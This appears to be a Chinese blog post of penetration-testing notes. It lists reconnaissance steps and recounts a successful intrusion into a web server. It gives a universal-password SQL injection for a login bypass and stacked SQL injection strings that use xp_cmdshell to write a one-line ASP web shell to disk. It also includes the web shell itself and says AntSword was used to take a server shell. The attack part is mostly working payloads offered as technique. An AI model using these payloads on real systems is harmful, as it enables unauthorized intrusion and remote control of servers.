zoukankan      html  css  js  c++  java
  • 渗透过程

    信息收集

    1.IP信息

    17CE

    看是否存在cdn

    存在的话,查找真实ip

    • 从国外去访问,查看ip信息
    • 去掉www,然后查看ip信息

    2.旁站信息

    • webscan.cc

    • 站长之家

    3.C段信息

    • webscan.cc

    • 站长之家

    4.子域名信息

    • layer子域名挖掘机
    • subdomain

    5.端口信息

    • nmap
    • portscan

    6.网站目录信息

    • dirsearch
    • dirb

    目的是扩大攻击面,寻找防护薄弱点和可利用信息

    寻找可能存在漏洞的地方

    • 登陆界面 可能存在sql注入,可以先使用admin' or 1=1 --+ 之类的语句尝试绕过

    • 搜索界面 可能存在sql注入和存储型和DOM型xss等

    • 上传界面 可以上传一些木马之类东西:

      eg:上传一句话木马,然后使用中国蚁剑去连接(中国菜刀没有中国蚁剑好用!!)

    • 涉及密码或者其它敏感信息的地方 可以进行抓包分析,查看请求包和响应包,看一下有没有什么可以利用的信息,或者有可以修改的参数之类的东西,如果有进行修改,理解每个参数的意义和变化

    一次成功的经验

    收集信息发现子域名信息,找到一个可以利用的ip,进行端口扫描和网站目录爆破,发现后台管理界面,尝试万能密码进行绕过,成功,里面没有什么可以利用的信息,然后寻找上传接口,然后发现可以从登陆界面上传文件,

    一句话木马:

    <%execute(request("kxc"))%>
    

    mysql开启存储过程

    exec master..xp_cmdshell
    

    echo中使用^转义特殊字符

    ss' ;exec master..xp_cmdshell "echo dfvdf > D:\KEFU\a.asp"; --+
    

    定义一个变量,然后将变量输入到文件中

    sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:KEFU1.asp' exec master..xp_cmdshell @cmd;--+
    

    然后使用中国蚁剑连接,可以获得服务器shell


    参考链接

    参考

  • 相关阅读:
    rsync命令 SCP命令
    Linux 性能分析 工具命令
    ntp时间服务器 时间同步
    Linux 邮件服务
    linux 手工释放内存 高内存 内存回收 方法思路
    LVM 逻辑卷 (logica volume manager)
    Linux 磁盘原理与管理 (分区 挂载)
    linux中查看nginx、apache、php、mysql配置文件路径
    shell脚本 监控ps 不存在则重启
    Shell脚本 一键重启
  • 原文地址:https://www.cnblogs.com/tomyyyyy/p/11178557.html
Copyright © 2011-2022 走看看